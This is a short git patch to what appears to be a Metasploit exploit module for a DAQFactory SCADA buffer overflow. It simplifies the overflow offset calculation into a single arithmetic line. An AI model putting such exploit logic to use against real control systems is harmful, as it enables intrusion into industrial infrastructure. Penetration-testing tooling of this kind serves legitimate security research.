From 936f3de84cf40291237aeacff76f47558ead2e29 Mon Sep 17 00:00:00 2001
From: Wei Chen <Wei_Chen@rapid7.com>
Date: Tue, 20 Sep 2011 18:56:21 +0000
Subject: [PATCH] This simple math would do the trick

git-svn-id: file:///home/svn/framework3/trunk@13766 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../exploits/windows/scada/daq_factory_bof.rb | 26 +------------------
 1 file changed, 1 insertion(+), 25 deletions(-)

diff --git a/modules/exploits/windows/scada/daq_factory_bof.rb b/modules/exploits/windows/scada/daq_factory_bof.rb
index e37855240c..b7d1c87ce7 100644
--- a/modules/exploits/windows/scada/daq_factory_bof.rb
+++ b/modules/exploits/windows/scada/daq_factory_bof.rb
@@ -84,31 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		# Correct the offset according to the 2nd IP (DHCP) length
 		iplen = datastore['DHCP'].length
-
-		if iplen == 15
-			offset = 78
-		elsif iplen == 14
-			offset = 79
-		elsif iplen == 13
-			offset = 80
-		elsif iplen == 12
-			offset = 81
-		elsif iplen == 11
-			offset = 82
-		elsif iplen == 10
-			offset = 83
-		elsif iplen == 9
-			offset = 84
-		elsif iplen == 8
-			offset = 85
-		elsif iplen == 7
-			offset = 86
-		elsif iplen == 6
-			offset = 87
-		# attack class A ip, slightly unlikly, but just in case.
-		elsif iplen == 5
-			offset = 88	
-		end	
+		offset = 93-iplen
 
 		if offset >= 80
 			pktoffset = offset - 80